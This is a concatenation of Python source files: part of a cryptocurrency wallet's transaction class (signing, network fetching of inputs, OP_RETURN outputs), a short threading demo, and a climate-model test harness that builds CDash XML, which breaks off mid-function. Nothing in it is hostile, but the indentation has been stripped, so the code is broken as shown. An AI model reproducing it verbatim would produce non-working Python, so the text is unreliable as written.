private_key = MySigningKey.from_secret_exponent(secexp, curve = SECP256k1)
public_key = private_key.get_verifying_key()
sig = private_key.sign_digest_deterministic(pre_hash, hashfunc=hashlib.sha256, sigencode = ecdsa.util.sigencode_der)
assert public_key.verify_digest(sig, pre_hash, sigdecode = ecdsa.util.sigdecode_der)
return sig
@staticmethod
def _schnorr_sign(pubkey, sec, pre_hash):
pubkey = bytes.fromhex(pubkey)
sig = schnorr.sign(sec, pre_hash)
assert schnorr.verify(pubkey, sig, pre_hash) # verify what we just signed
return sig
def sign(self, keypairs, *, use_cache=False):
for i, txin in enumerate(self.inputs()):
pubkeys, x_pubkeys = self.get_sorted_pubkeys(txin)
for j, (pubkey, x_pubkey) in enumerate(zip(pubkeys, x_pubkeys)):
if self.is_txin_complete(txin):
# txin is complete
break
if pubkey in keypairs:
_pubkey = pubkey
kname = 'pubkey'
elif x_pubkey in keypairs:
_pubkey = x_pubkey
kname = 'x_pubkey'
else:
continue
print_error(f"adding signature for input#{i} sig#{j}; {kname}: {_pubkey} schnorr: {self._sign_schnorr}")
sec, compressed = keypairs.get(_pubkey)
self._sign_txin(i, j, sec, compressed, use_cache=use_cache)
print_error("is_complete", self.is_complete())
self.raw = self.serialize()
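# Hedged usage sketch (not part of the original file): signing with an
# in-memory keypair map. Keys are hex-encoded pubkeys (or x_pubkeys) and
# values are (secret_key_bytes, compressed) tuples, matching what
# keypairs.get() returns above. The variable names are placeholders.
#
#   keypairs = {pubkey_hex: (sec_bytes, True)}
#   tx = Transaction(unsigned_hex, sign_schnorr=True)
#   tx.sign(keypairs)
#   assert tx.is_complete()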
def _sign_txin(self, i, j, sec, compressed, *, use_cache=False):
'''Note: precondition is self._inputs is valid (ie: tx is already deserialized)'''
pubkey = public_key_from_private_key(sec, compressed)
# add signature
nHashType = 0x00000041 # hardcoded, perhaps should be taken from unsigned input dict
pre_hash = Hash(bfh(self.serialize_preimage(i, nHashType, use_cache=use_cache)))
if self._sign_schnorr:
sig = self._schnorr_sign(pubkey, sec, pre_hash)
else:
sig = self._ecdsa_sign(sec, pre_hash)
reason = []
if not self.verify_signature(bfh(pubkey), sig, pre_hash, reason=reason):
print_error(f"Signature verification failed for input#{i} sig#{j}, reason: {str(reason)}")
return None
txin = self._inputs[i]
txin['signatures'][j] = bh2u(sig + bytes((nHashType & 0xff,)))
txin['pubkeys'][j] = pubkey # needed for fd keys
return txin
def get_outputs(self):
"""convert pubkeys to addresses"""
o = []
for type, addr, v in self.outputs():
o.append((addr,v)) # consider using yield (addr, v)
return o
def get_output_addresses(self):
return [addr for addr, val in self.get_outputs()]
def has_address(self, addr):
return (addr in self.get_output_addresses()) or (addr in (tx.get("address") for tx in self.inputs()))
def is_final(self):
return not any([x.get('sequence', 0xffffffff - 1) < 0xffffffff - 1
for x in self.inputs()])
def as_dict(self):
if self.raw is None:
self.raw = self.serialize()
self.deserialize()
out = {
'hex': self.raw,
'complete': self.is_complete(),
'final': self.is_final(),
}
return out
# This cache stores foreign (non-wallet) tx's we fetched from the network
# for the purposes of the "fetch_input_data" mechanism. Its max size has
# been thoughtfully calibrated to provide a decent tradeoff between
# memory consumption and UX.
#
# In even aggressive/pathological cases this cache won't ever exceed
# 100MB even when full. [see ExpiringCache.size_bytes() to test it].
# This is acceptable considering this is Python + Qt and it eats memory
# anyway.. and also this is 2019 ;). Note that all tx's in this cache
# are in the non-deserialized state (hex encoded bytes only) as a memory
# savings optimization. Please maintain that invariant if you modify this
# code, otherwise the cache may grow to 10x memory consumption if you
# put deserialized tx's in here.
_fetched_tx_cache = ExpiringCache(maxlen=1000, name="TransactionFetchCache")
def fetch_input_data(self, wallet, done_callback=None, done_args=tuple(),
prog_callback=None, *, force=False, use_network=True):
'''
Fetch all input data and put it in the 'ephemeral' dictionary, under
'fetched_inputs'. This call potentially initiates fetching of
prevout_hash transactions from the network for all inputs to this tx.
The fetched data is basically used for the Transaction dialog to be able
to display fee, actual address, and amount (value) for tx inputs.
`wallet` should ideally have a network object, but this function still
will work and is still useful if it does not.
`done_callback` is called with `done_args` (only if True was returned),
upon completion. Note that done_callback won't be called if this function
returns False. Also note that done_callback runs in a non-main thread
context and as such, if you want to do GUI work from within it, use
the appropriate Qt signal/slot mechanism to dispatch work to the GUI.
`prog_callback`, if specified, is called periodically to indicate
progress after inputs are retrieved, and it is passed a single arg,
"percent" (eg: 5.1, 10.3, 26.3, 76.1, etc) to indicate percent progress.
Note 1: Results (fetched transactions) are cached, so subsequent
calls to this function for the same transaction are cheap.
Note 2: Multiple, rapid calls to this function will cause the previous
asynchronous fetch operation (if active) to be canceled and only the
latest call will result in the invocation of the done_callback if/when
it completes.
'''
if not self._inputs:
return False
if force:
# forced-run -- start with empty list
inps = []
else:
# may be a new list or list that was already in dict
inps = self.fetched_inputs(require_complete = True)
if len(self._inputs) == len(inps):
# we already have results, don't do anything.
return False
eph = self.ephemeral
eph['fetched_inputs'] = inps = inps.copy() # paranoia: in case another thread is running on this list
# Lazy imports to keep this functionality very self-contained
# These modules are always available so no need to globally import them.
import threading
import queue
import time
from copy import deepcopy
from collections import defaultdict
t0 = time.time()
t = None
cls = __class__
self_txid = self.txid()
def doIt():
'''
This function is seemingly complex, but it's really conceptually
simple:
1. Fetch all prevouts either from cache (wallet or global tx_cache)
2. Or, if they aren't in either cache, then we will asynchronously
queue the raw tx gets to the network in parallel, across *all*
our connected servers. This is very fast, and spreads the load
around.
Tested with a huge tx of 600+ inputs all coming from different
prevout_hashes on mainnet, and it's super fast:
cd8fcc8ad75267ff9ad314e770a66a9e871be7882b7c05a7e5271c46bfca98bc '''
last_prog = -9999.0
need_dl_txids = defaultdict(list) # the dict of txids we will need to download (wasn't in cache)
def prog(i, prog_total=100):
''' notify interested code about progress '''
nonlocal last_prog
if prog_callback:
prog = ((i+1)*100.0)/prog_total
if prog - last_prog > 5.0:
prog_callback(prog)
last_prog = prog
while eph.get('_fetch') == t and len(inps) < len(self._inputs):
i = len(inps)
inp = deepcopy(self._inputs[i])
typ, prevout_hash, n, addr, value = inp.get('type'), inp.get('prevout_hash'), inp.get('prevout_n'), inp.get('address'), inp.get('value')
if not prevout_hash or n is None:
raise RuntimeError('Missing prevout_hash and/or prevout_n')
if typ != 'coinbase' and (not isinstance(addr, Address) or value is None):
tx = cls.tx_cache_get(prevout_hash) or wallet.transactions.get(prevout_hash)
if tx:
# Tx was in cache or wallet.transactions, proceed
# note that the tx here should be in the "not
# deserialized" state
if tx.raw:
# Note we deserialize a *copy* of the tx so as to
# save memory. We do not want to deserialize the
# cached tx because if we do so, the cache will
# contain a deserialized tx which will take up
# several times the memory when deserialized due to
# Python's memory use being less efficient than the
# binary-only raw bytes. So if you modify this code
# do bear that in mind.
tx = Transaction(tx.raw)
try:
tx.deserialize()
# The below txid check is commented-out as
# we trust wallet tx's and the network
# tx's that fail this check are never
# put in cache anyway.
#txid = tx._txid(tx.raw)
#if txid != prevout_hash: # sanity check
# print_error("fetch_input_data: cached prevout_hash {} != tx.txid() {}, ignoring.".format(prevout_hash, txid))
except Exception as e:
print_error("fetch_input_data: WARNING failed to deserialize {}: {}".format(prevout_hash, repr(e)))
tx = None
else:
tx = None
print_error("fetch_input_data: WARNING cached tx lacked any 'raw' bytes for {}".format(prevout_hash))
# now, examine the deserialized tx, if it's still good
if tx:
if n < len(tx.outputs()):
outp = tx.outputs()[n]
addr, value = outp[1], outp[2]
inp['value'] = value
inp['address'] = addr
print_error("fetch_input_data: fetched cached", i, addr, value)
else:
print_error("fetch_input_data: ** FIXME ** should never happen -- n={} >= len(tx.outputs())={} for prevout {}".format(n, len(tx.outputs()), prevout_hash))
else:
# tx was not in cache or wallet.transactions, mark
# it for download below (this branch can also execute
# in the unlikely case where there was an error above)
need_dl_txids[prevout_hash].append((i, n)) # remember the input# as well as the prevout_n
inps.append(inp) # append either cached result or as-yet-incomplete copy of _inputs[i]
# Now, download the tx's we didn't find above if network is available
# and caller said it's ok to go out to the network.. otherwise just return
# what we have
if use_network and eph.get('_fetch') == t and wallet.network:
callback_funcs_to_cancel = set()
try: # the whole point of this try block is the `finally` way below...
prog(-1) # tell interested code that progress is now 0%
# Next, queue the transaction.get requests, spreading them
# out randomly over the connected interfaces
q = queue.Queue()
q_ct = 0
bad_txids = set()
def put_in_queue_and_cache(r):
''' we cache the results directly in the network callback
as even if the user cancels the operation, we would like
to save the returned tx in our cache, since we did the
work to retrieve it anyway. '''
q.put(r) # put the result in the queue no matter what it is
txid = ''
try:
# Below will raise if response was 'error' or
# otherwise invalid. Note: for performance reasons
# we don't validate the tx here or deserialize it as
# this function runs in the network thread and we
# don't want to eat up that thread's CPU time
# needlessly. Also note the cache doesn't store
# deserialized tx's so as to save memory. We
# always deserialize a copy when reading the cache.
tx = Transaction(r['result'])
txid = r['params'][0]
assert txid == cls._txid(tx.raw), "txid-is-sane-check" # protection against phony responses
cls.tx_cache_put(tx=tx, txid=txid) # save tx to cache here
except Exception as e:
# response was not valid, ignore (don't cache)
if txid: # txid may be '' if KeyError from r['result'] above
bad_txids.add(txid)
print_error("fetch_input_data: put_in_queue_and_cache fail for txid:", txid, repr(e))
for txid, l in need_dl_txids.items():
wallet.network.queue_request('blockchain.transaction.get', [txid],
interface='random',
callback=put_in_queue_and_cache)
callback_funcs_to_cancel.add(put_in_queue_and_cache)
q_ct += 1
def get_bh():
if eph.get('block_height'):
return False
lh = wallet.network.get_server_height() or wallet.get_local_height()
def got_tx_info(r):
q.put('block_height') # indicate to other thread we got the block_height reply from network
try:
confs = r.get('result').get('confirmations', 0) # will raise if the reply is an error
if confs and lh:
# the whole point.. was to get this piece of data.. the block_height
eph['block_height'] = bh = lh - confs + 1
print_error('fetch_input_data: got tx block height', bh)
else:
print_error('fetch_input_data: tx block height could not be determined')
except Exception as e:
print_error('fetch_input_data: get_bh fail:', str(e), r)
if self_txid:
wallet.network.queue_request('blockchain.transaction.get', [self_txid,True],
interface=None, callback=got_tx_info)
callback_funcs_to_cancel.add(got_tx_info)
return True
if get_bh():
q_ct += 1
class ErrorResp(Exception):
pass
for i in range(q_ct):
# now, read the q back, with a 10 second timeout, and
# populate the inputs
try:
r = q.get(timeout=10)
if eph.get('_fetch') != t:
# early abort from func, canceled
break
if r == 'block_height':
# ignore block_height reply from network.. was already processed in other thread in got_tx_info above
continue
if r.get('error'):
msg = r.get('error')
if isinstance(msg, dict):
msg = msg.get('message') or 'unknown error'
raise ErrorResp(msg)
rawhex = r['result']
txid = r['params'][0]
assert txid not in bad_txids, "txid marked bad" # skip if was marked bad by our callback code
tx = Transaction(rawhex); tx.deserialize()
for item in need_dl_txids[txid]:
ii, n = item
assert n < len(tx.outputs())
outp = tx.outputs()[n]
addr, value = outp[1], outp[2]
inps[ii]['value'] = value
inps[ii]['address'] = addr
print_error("fetch_input_data: fetched from network", ii, addr, value)
prog(i, q_ct) # tell interested code of progress
except queue.Empty:
print_error("fetch_input_data: timed out after 10.0s fetching from network, giving up.")
break
except Exception as e:
print_error("fetch_input_data:", repr(e))
finally:
# force-cancel any extant requests -- this is especially
# crucial on error/timeout/failure.
for func in callback_funcs_to_cancel:
wallet.network.cancel_requests(func)
if len(inps) == len(self._inputs) and eph.get('_fetch') == t: # sanity check
eph.pop('_fetch', None) # potential race condition here, popping wrong t -- but in practice w/ CPython threading it won't matter
print_error(f"fetch_input_data: elapsed {(time.time()-t0):.4f} sec")
if done_callback:
done_callback(*done_args)
# /doIt
t = threading.Thread(target=doIt, daemon=True)
eph['_fetch'] = t
t.start()
return True
def fetched_inputs(self, *, require_complete=False):
''' Returns the complete list of asynchronously fetched inputs for
this tx, if they exist. If the list is not yet fully retrieved, and
require_complete == False, returns what it has so far
(the returned list will always have length equal to len(self._inputs),
with not-yet downloaded inputs coming from self._inputs and not
necessarily containing a good 'address' or 'value').
If the download failed completely or was never started, will return the
empty list [].
Note that some inputs may still lack key: 'value' if there was a network
error in retrieving them or if the download is still in progress.'''
if self._inputs:
ret = self.ephemeral.get('fetched_inputs') or []
diff = len(self._inputs) - len(ret)
if diff > 0 and self.ephemeral.get('_fetch') and not require_complete:
# in progress.. so return what we have so far
return ret + self._inputs[len(ret):]
elif diff == 0 and (not require_complete or not self.ephemeral.get('_fetch')):
# finished *or* in-progress and require_complete==False
return ret
return []
def fetch_cancel(self) -> bool:
''' Cancels the currently-active running fetch operation, if any '''
return bool(self.ephemeral.pop('_fetch', None))
@classmethod
def tx_cache_get(cls, txid : str) -> object:
''' Attempts to retrieve txid from the tx cache that this class
keeps in-memory. Returns None on failure. The returned tx is
not deserialized, and is a copy of the one in the cache. '''
tx = cls._fetched_tx_cache.get(txid)
if tx is not None and tx.raw:
# make sure to return a copy of the transaction from the cache
# so that if caller does .deserialize(), *his* instance will
# use up 10x memory consumption, and not the cached instance which
# should just be an undeserialized raw tx.
return Transaction(tx.raw)
return None
@classmethod
def tx_cache_put(cls, tx : object, txid : str = None):
''' Puts a non-deserialized copy of tx into the tx_cache. '''
if not tx or not tx.raw:
raise ValueError('Please pass a tx which has a valid .raw attribute!')
txid = txid or cls._txid(tx.raw) # optionally, caller can pass-in txid to save CPU time for hashing
cls._fetched_tx_cache.put(txid, Transaction(tx.raw))
def tx_from_str(txt):
"json or raw hexadecimal"
import json
txt = txt.strip()
if not txt:
raise ValueError("empty string")
try:
bfh(txt)
is_hex = True
except:
is_hex = False
if is_hex:
return txt
tx_dict = json.loads(str(txt))
assert "hex" in tx_dict.keys()
return tx_dict["hex"]
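# Illustrative sketch (not part of the original module): tx_from_str() accepts
# either a raw hex string or a JSON object carrying a "hex" key, and returns
# the hex in both cases. The "0100" payload below is a placeholder, not a
# real transaction.
def _example_tx_from_str_usage():
    raw_form = tx_from_str("0100")              # hex input passes through unchanged
    json_form = tx_from_str('{"hex": "0100"}')  # JSON input returns its "hex" field
    assert raw_form == json_form == "0100"
    return raw_form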
# ---
class OPReturn:
''' OPReturn helper namespace. Used by GUI main_window.py and also
oregano/commands.py '''
class Error(Exception):
""" thrown when the OP_RETURN for a tx not of the right format """
class TooLarge(Error):
""" thrown when the OP_RETURN for a tx is >220 bytes """
@staticmethod
def output_for_stringdata(op_return):
from .i18n import _
if not isinstance(op_return, str):
raise OPReturn.Error('OP_RETURN parameter needs to be of type str!')
op_return_code = "OP_RETURN "
op_return_encoded = op_return.encode('utf-8')
if len(op_return_encoded) > 220:
raise OPReturn.TooLarge(_("OP_RETURN message too large, needs to be no longer than 220 bytes"))
op_return_payload = op_return_encoded.hex()
script = op_return_code + op_return_payload
amount = 0
return (TYPE_SCRIPT, ScriptOutput.from_string(script), amount)
@staticmethod
def output_for_rawhex(op_return):
from .i18n import _
if not isinstance(op_return, str):
raise OPReturn.Error('OP_RETURN parameter needs to be of type str!')
if op_return == 'empty':
op_return = ''
try:
op_return_script = b'\x6a' + bytes.fromhex(op_return.strip())
except ValueError:
raise OPReturn.Error(_('OP_RETURN script expected to be hexadecimal bytes'))
if len(op_return_script) > 223:
raise OPReturn.TooLarge(_("OP_RETURN script too large, needs to be no longer than 223 bytes"))
amount = 0
return (TYPE_SCRIPT, ScriptOutput.protocol_factory(op_return_script), amount)
# /OPReturn
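# Illustrative sketch (not part of the original module): building an OP_RETURN
# output tuple from a short text payload via OPReturn.output_for_stringdata().
# "hello op_return" is a placeholder message well under the 220-byte limit.
def _example_op_return_output():
    try:
        return OPReturn.output_for_stringdata("hello op_return")
    except OPReturn.Error as e:
        # Raised for non-str payloads or (via the TooLarge subclass) messages
        # longer than 220 bytes.
        print_error("OP_RETURN example failed:", repr(e))
        return None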
|
main_thread.py
|
import threading
import time
def my_child_thread():
print("Child Thread Starting")
time.sleep(5)
print("Current Thread ----------")
print(threading.current_thread())
print("-------------------------")
print("Main Thread -------------")
print(threading.main_thread())
print("-------------------------")
print("Child Thread Ending")
child = threading.Thread(target=my_child_thread)
child.start()
child.join()
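# Optional illustration (not part of the original demo): after join() returns,
# only the main thread should remain alive. Both helpers below are standard
# threading-module calls.
print("Active threads after join:", threading.active_count())
print("Thread list:", threading.enumerate())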
|
wait_for_tests.py
|
#pylint: disable=import-error
from six.moves import queue
import os, time, threading, socket, signal, shutil, glob
#pylint: disable=import-error
from distutils.spawn import find_executable
import logging
import xml.etree.ElementTree as xmlet
import CIME.utils
from CIME.utils import expect, Timeout, run_cmd_no_fail, safe_copy, CIMEError
from CIME.XML.machines import Machines
from CIME.test_status import *
SIGNAL_RECEIVED = False
E3SM_MAIN_CDASH = "ACME_Climate"
CDASH_DEFAULT_BUILD_GROUP = "ACME_Latest"
SLEEP_INTERVAL_SEC = .1
###############################################################################
def signal_handler(*_):
###############################################################################
global SIGNAL_RECEIVED
SIGNAL_RECEIVED = True
###############################################################################
def set_up_signal_handlers():
###############################################################################
signal.signal(signal.SIGTERM, signal_handler)
signal.signal(signal.SIGINT, signal_handler)
###############################################################################
def get_test_time(test_path):
###############################################################################
ts = TestStatus(test_dir=test_path)
comment = ts.get_comment(RUN_PHASE)
if comment is None or "time=" not in comment:
logging.warning("No run-phase time data found in {}".format(test_path))
return 0
else:
time_data = [token for token in comment.split() if token.startswith("time=")][0]
return int(time_data.split("=")[1])
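###############################################################################
def _example_run_phase_time_comment():
###############################################################################
    # Illustrative sketch (not part of the original module): get_test_time()
    # above expects the RUN_PHASE comment to carry a "time=<seconds>" token;
    # the string below is a hypothetical comment that would yield 42.
    comment = "PASS time=42"
    time_data = [token for token in comment.split() if token.startswith("time=")][0]
    return int(time_data.split("=")[1])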
###############################################################################
def get_test_output(test_path):
###############################################################################
output_file = os.path.join(test_path, "TestStatus.log")
if (os.path.exists(output_file)):
return open(output_file, 'r').read()
else:
logging.warning("File '{}' not found".format(output_file))
return ""
###############################################################################
def create_cdash_xml_boiler(phase, cdash_build_name, cdash_build_group, utc_time, current_time, hostname, git_commit):
###############################################################################
site_elem = xmlet.Element("Site")
if ("JENKINS_START_TIME" in os.environ):
time_info_str = "Total testing time: {:d} seconds".format(int(current_time) - int(os.environ["JENKINS_START_TIME"]))
else:
time_info_str = ""
site_elem.attrib["BuildName"] = cdash_build_name
site_elem.attrib["BuildStamp"] = "{}-{}".format(utc_time, cdash_build_group)
site_elem.attrib["Name"] = hostname
site_elem.attrib["OSName"] = "Linux"
site_elem.attrib["Hostname"] = hostname
site_elem.attrib["OSVersion"] = "Commit: {}{}".format(git_commit, time_info_str)
phase_elem = xmlet.SubElement(site_elem, phase)
xmlet.SubElement(phase_elem, "StartDateTime").text = time.ctime(current_time)
xmlet.SubElement(phase_elem, "Start{}Time".format("Test" if phase == "Testing" else phase)).text = str(int(current_time))
return site_elem, phase_elem
###############################################################################
def create_cdash_config_xml(results, cdash_build_name, cdash_build_group, utc_time, current_time, hostname, data_rel_path, git_commit):
###############################################################################
site_elem, config_elem = create_cdash_xml_boiler("Configure", cdash_build_name, cdash_build_group, utc_time, current_time, hostname, git_commit)
xmlet.SubElement(config_elem, "ConfigureCommand").text = "namelists"
config_results = []
for test_name in sorted(results):
test_status = results[test_name][1]
config_results.append("{} {} Config {}".format("" if test_status != NAMELIST_FAIL_STATUS else "CMake Warning:\n", test_name, "PASS" if test_status != NAMELIST_FAIL_STATUS else "NML DIFF"))
xmlet.SubElement(config_elem, "Log").text = "\n".join(config_results)
xmlet.SubElement(config_elem, "ConfigureStatus").text = "0"
xmlet.SubElement(config_elem, "ElapsedMinutes").text = "0" # Skip for now
etree = xmlet.ElementTree(site_elem)
etree.write(os.path.join(data_rel_path, "Configure.xml"))
###############################################################################
def create_cdash_build_xml(results, cdash_build_name, cdash_build_group, utc_time, current_time, hostname, data_rel_path, git_commit):
###############################################################################
site_elem, build_elem = create_cdash_xml_boiler("Build", cdash_build_name, cdash_build_group, utc_time, current_time, hostname, git_commit)
xmlet.SubElement(build_elem, "ConfigureCommand").text = "case.build"
build_results = []
for test_name in sorted(results):
build_results.append(test_name)
xmlet.SubElement(build_elem, "Log").text = "\n".join(build_results)
for idx, test_name in enumerate(sorted(results)):
test_path = results[test_name][0]
test_norm_path = test_path if os.path.isdir(test_path) else os.path.dirname(test_path)
if get_test_time(test_norm_path) == 0:
error_elem = xmlet.SubElement(build_elem, "Error")
xmlet.SubElement(error_elem, "Text").text = test_name
xmlet.SubElement(error_elem, "BuildLogLine").text = str(idx)
xmlet.SubElement(error_elem, "PreContext").text = test_name
xmlet.SubElement(error_elem, "PostContext").text = ""
xmlet.SubElement(error_elem, "RepeatCount").text = "0"
xmlet.SubElement(build_elem, "ElapsedMinutes").text = "0" # Skip for now
etree = xmlet.ElementTree(site_elem)
etree.write(os.path.join(data_rel_path, "Build.xml"))
###############################################################################
def create_cdash_test_xml(results, cdash_build_name, cdash_build_group, utc_time, current_time, hostname, data_rel_path, git_commit):
###############################################################################
site_elem, testing_elem = create_cdash_xml_boiler("Testing", cdash_build_name, cdash_build_group, utc_time, current_time, hostname, git_commit)
test_list_elem = xmlet.SubElement(testing_elem, "TestList")
for test_name in sorted(results):
xmlet.SubElement(test_list_elem, "Test").text = test_name
for test_name in sorted(results):
test_path, test_status = results[test_name]
test_passed = test_status in [TEST_PASS_STATUS, NAMELIST_FAIL_STATUS]
test_norm_path = test_path if os.path.isdir(test_path) else os.path.dirname(test_path)
full_test_elem = xmlet.SubElement(testing_elem, "Test")
if test_passed:
full_test_elem.attrib["Status"] = "passed"
elif (test_status == TEST_PEND_STATUS):
full_test_elem.attrib["Status"] = "notrun"
else:
full_test_elem.attrib["Status"] = "failed"
xmlet.SubElement(full_test_elem, "Name").text = test_name
xmlet.SubElement(full_test_elem, "Path").text = test_norm_path
xmlet.SubElement(full_test_elem, "FullName").text = test_name
xmlet.SubElement(full_test_elem, "FullCommandLine")
# text ?
results_elem = xmlet.SubElement(full_test_elem, "Results")
named_measurements = (
("text/string", "Exit Code", test_status),
("text/string", "Exit Value", "0" if test_passed else "1"),
("numeric_double", "Execution Time", str(get_test_time(test_norm_path))),
("text/string", "Completion Status", "Not Completed" if test_status == TEST_PEND_STATUS else "Completed"),
("text/string", "Command line", "create_test")
)
for type_attr, name_attr, value in named_measurements:
named_measurement_elem = xmlet.SubElement(results_elem, "NamedMeasurement")
named_measurement_elem.attrib["type"] = type_attr
named_measurement_elem.attrib["name"] = name_attr
xmlet.SubElement(named_measurement_elem, "Value").text = value
measurement_elem = xmlet.SubElement(results_elem, "Measurement")
value_elem = xmlet.SubElement(measurement_elem, "Value")
value_elem.text = ''.join([item for item in get_test_output(test_norm_path) if ord(item) < 128])
xmlet.SubElement(testing_elem, "ElapsedMinutes").text = "0" # Skip for now
etree = xmlet.ElementTree(site_elem)
etree.write(os.path.join(data_rel_path, "Test.xml"))
###############################################################################
def create_cdash_xml_fakes(results, cdash_build_name, cdash_build_group, utc_time, current_time, hostname):
###############################################################################
# We assume all cases were created from the same code repo
first_result_case = os.path.dirname(list(results.items())[0][1][0])
try:
srcroot = run_cmd_no_fail("./xmlquery --value CIMEROOT", from_dir=first_result_case)
except CIMEError:
# Use repo containing this script as last resort
srcroot = CIME.utils.get_cime_root()
git_commit = CIME.utils.get_current_commit(repo=srcroot)
data_rel_path = os.path.join("Testing", utc_time)
create_cdash_config_xml(results, cdash_build_name, cdash_build_group, utc_time, current_time, hostname, data_rel_path, git_commit)
create_cdash_build_xml(results, cdash_build_name, cdash_build_group, utc_time, current_time, hostname, data_rel_path, git_commit)
create_cdash_test_xml(results, cdash_build_name, cdash_build_group, utc_time, current_time, hostname, data_rel_path, git_commit)
###############################################################################
def create_cdash_upload_xml(results, cdash_build_name, cdash_build_group, utc_time, hostname, force_log_upload):
###############################################################################
data_rel_path = os.path.join("Testing", utc_time)
try:
log_dir = "{}_logs".format(cdash_build_name)
need_to_upload = False
for test_name, test_data in results.items():
test_path, test_status = test_data
if test_status not in [TEST_PASS_STATUS, NAMELIST_FAIL_STATUS] or force_log_upload:
test_case_dir = os.path.dirname(test_path)
ts = TestStatus(test_case_dir)
build_status = ts.get_status(SHAREDLIB_BUILD_PHASE)
build_status = TEST_FAIL_STATUS if build_status == TEST_FAIL_STATUS else ts.get_status(MODEL_BUILD_PHASE)
run_status = ts.get_status(RUN_PHASE)
baseline_status = ts.get_status(BASELINE_PHASE)
if build_status == TEST_FAIL_STATUS or run_status == TEST_FAIL_STATUS or baseline_status == TEST_FAIL_STATUS or force_log_upload:
case_dirs = [test_case_dir]
case_base = os.path.basename(test_case_dir)
test_case2_dir = os.path.join(test_case_dir, "case2", case_base)
if os.path.exists(test_case2_dir):
case_dirs.append(test_case2_dir)
for case_dir in case_dirs:
param = "EXEROOT" if build_status == TEST_FAIL_STATUS else "RUNDIR"
log_src_dir = run_cmd_no_fail("./xmlquery {} --value".format(param), from_dir=case_dir)
log_dst_dir = os.path.join(log_dir, "{}{}_{}_logs".format(test_name, "" if case_dir == test_case_dir else ".case2", param))
os.makedirs(log_dst_dir)
for log_file in glob.glob(os.path.join(log_src_dir, "*log*")):
safe_copy(log_file, log_dst_dir)
for log_file in glob.glob(os.path.join(log_src_dir, "*.cprnc.out*")):
safe_copy(log_file, log_dst_dir)
need_to_upload = True
if (need_to_upload):
tarball = "{}.tar.gz".format(log_dir)
if (os.path.exists(tarball)):
os.remove(tarball)
run_cmd_no_fail("tar -cf - {} | gzip -c".format(log_dir), arg_stdout=tarball)
base64 = run_cmd_no_fail("base64 {}".format(tarball))
xml_text = \
r"""<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="Dart/Source/Server/XSL/Build.xsl <file:///Dart/Source/Server/XSL/Build.xsl> "?>
<Site BuildName="{}" BuildStamp="{}-{}" Name="{}" Generator="ctest3.0.0">
<Upload>
<File filename="{}">
<Content encoding="base64">
{}
</Content>
</File>
</Upload>
</Site>
""".format(cdash_build_name, utc_time, cdash_build_group, hostname, os.path.abspath(tarball), base64)
with open(os.path.join(data_rel_path, "Upload.xml"), "w") as fd:
fd.write(xml_text)
finally:
if (os.path.isdir(log_dir)):
shutil.rmtree(log_dir)
###############################################################################
def create_cdash_xml(results, cdash_build_name, cdash_project, cdash_build_group, force_log_upload=False):
###############################################################################
#
# Create dart config file
#
current_time = time.time()
utc_time_tuple = time.gmtime(current_time)
cdash_timestamp = time.strftime("%H:%M:%S", utc_time_tuple)
hostname = Machines().get_machine_name()
if (hostname is None):
hostname = socket.gethostname().split(".")[0]
logging.warning("Could not convert hostname '{}' into an E3SM machine name".format(hostname))
dart_config = \
"""
SourceDirectory: {0}
BuildDirectory: {0}
# Site is something like machine.domain, i.e. pragmatic.crd
Site: {1}
# Build name is osname-revision-compiler, i.e. Linux-2.4.2-2smp-c++
BuildName: {2}
# Submission information
IsCDash: TRUE
CDashVersion:
QueryCDashVersion:
DropSite: my.cdash.org
DropLocation: /submit.php?project={3}
DropSiteUser:
DropSitePassword:
DropSiteMode:
DropMethod: http
TriggerSite:
ScpCommand: {4}
# Dashboard start time
NightlyStartTime: {5} UTC
""".format(os.getcwd(), hostname, cdash_build_name, cdash_project,
find_executable("scp"), cdash_timestamp)
with open("DartConfiguration.tcl", "w") as dart_fd:
dart_fd.write(dart_config)
utc_time = time.strftime('%Y%m%d-%H%M', utc_time_tuple)
os.makedirs(os.path.join("Testing", utc_time))
# Make tag file
with open("Testing/TAG", "w") as tag_fd:
tag_fd.write("{}\n{}\n".format(utc_time, cdash_build_group))
create_cdash_xml_fakes(results, cdash_build_name, cdash_build_group, utc_time, current_time, hostname)
create_cdash_upload_xml(results, cdash_build_name, cdash_build_group, utc_time, hostname, force_log_upload)
run_cmd_no_fail("ctest -VV -D NightlySubmit", verbose=True)
###############################################################################
def wait_for_test(test_path, results, wait, check_throughput, check_memory, ignore_namelists, ignore_memleak, no_run):
###############################################################################
if (os.path.isdir(test_path)):
test_status_filepath = os.path.join(test_path, TEST_STATUS_FILENAME)
else:
test_status_filepath = test_path
logging.debug("Watching file: '{}'".format(test_status_filepath))
test_log_path = os.path.join(os.path.dirname(test_status_filepath), ".internal_test_status.log")
# We don't want to make it a requirement that wait_for_tests has write access
# to all case directories
try:
fd = open(test_log_path, "w")
fd.close()
except (IOError, OSError):
test_log_path = "/dev/null"
prior_ts = None
with open(test_log_path, "w") as log_fd:
while (True):
if (os.path.exists(test_status_filepath)):
ts = TestStatus(test_dir=os.path.dirname(test_status_filepath))
test_name = ts.get_name()
test_status = ts.get_overall_test_status(wait_for_run=not no_run, # Important
no_run=no_run,
check_throughput=check_throughput,
check_memory=check_memory, ignore_namelists=ignore_namelists,
ignore_memleak=ignore_memleak)
if prior_ts is not None and prior_ts != ts:
log_fd.write(ts.phase_statuses_dump())
log_fd.write("OVERALL: {}\n\n".format(test_status))
prior_ts = ts
if (test_status == TEST_PEND_STATUS and (wait and not SIGNAL_RECEIVED)):
time.sleep(SLEEP_INTERVAL_SEC)
logging.debug("Waiting for test to finish")
else:
results.put( (test_name, test_path, test_status) )
break
else:
if (wait and not SIGNAL_RECEIVED):
logging.debug("File '{}' does not yet exist".format(test_status_filepath))
time.sleep(SLEEP_INTERVAL_SEC)
else:
test_name = os.path.abspath(test_status_filepath).split("/")[-2]
results.put( (test_name, test_path, "File '{}' doesn't exist".format(test_status_filepath)) )
break
###############################################################################
def wait_for_tests_impl(test_paths, no_wait=False, check_throughput=False, check_memory=False, ignore_namelists=False, ignore_memleak=False, no_run=False):
###############################################################################
results = queue.Queue()
for test_path in test_paths:
t = threading.Thread(target=wait_for_test, args=(test_path, results, not no_wait, check_throughput, check_memory, ignore_namelists, ignore_memleak, no_run))
t.daemon = True
t.start()
while threading.active_count() > 1:
time.sleep(1)
test_results = {}
completed_test_paths = []
while (not results.empty()):
test_name, test_path, test_status = results.get()
if (test_name in test_results):
prior_path, prior_status = test_results[test_name]
if (test_status == prior_status):
